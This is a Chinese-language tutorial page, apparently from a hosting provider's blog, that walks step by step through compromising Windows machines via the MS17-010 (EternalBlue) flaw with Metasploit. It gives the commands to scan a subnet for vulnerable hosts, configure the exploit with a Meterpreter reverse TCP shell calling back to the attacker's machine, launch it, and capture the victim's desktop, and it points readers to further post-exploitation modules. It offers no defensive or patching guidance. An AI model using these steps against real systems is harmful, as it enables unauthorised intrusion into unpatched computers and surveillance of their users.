&..."/>
您好,登錄后才能下訂單哦!
過程:
1、掃描: 信息搜集(刺探)
2、漏洞利用
一、首先檢測網(wǎng)段內(nèi)存在漏洞的主機(jī)系統(tǒng):
使用命令:
msf > use auxiliary/scanner/smb/smb_ms17_010 //加載掃描exp msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24 //配置掃描網(wǎng)段 msf auxiliary(scanner/smb/smb_ms17_010) > run //進(jìn)行掃描
結(jié)果如下:
二、漏洞利用
msf利用命令如下:
msf > use exploit/windows/smb/ms17_010_eternalblue //加載***模塊 msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25 //配置***目標(biāo)IP RHOSTS => 192.168.22.25 msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146 //配置本機(jī)IP LHOST => 192.168.5.146 msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //配置回鏈方式 payload => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/ms17_010_eternalblue) >
查看當(dāng)前配置的payload
msf exploit(windows/smb/ms17_010_eternalblue) > show options //查看配置選項(xiàng) Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.22.25 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.5.146 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf exploit(windows/smb/ms17_010_eternalblue) >
發(fā)起***:
***命令: msf exploit(windows/smb/ms17_010_eternalblue) > exploit //發(fā)起***
獲取對方電腦桌面:
meterpreter > screenshot Screenshot saved to: /root/RBDEvfGv.jpeg //可以到root目錄下 查看對方電腦的截屏
獲取shel權(quán)限
有關(guān)更多獲取權(quán)限后的***技巧, 請自行百度 msf 后*** ***模塊
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。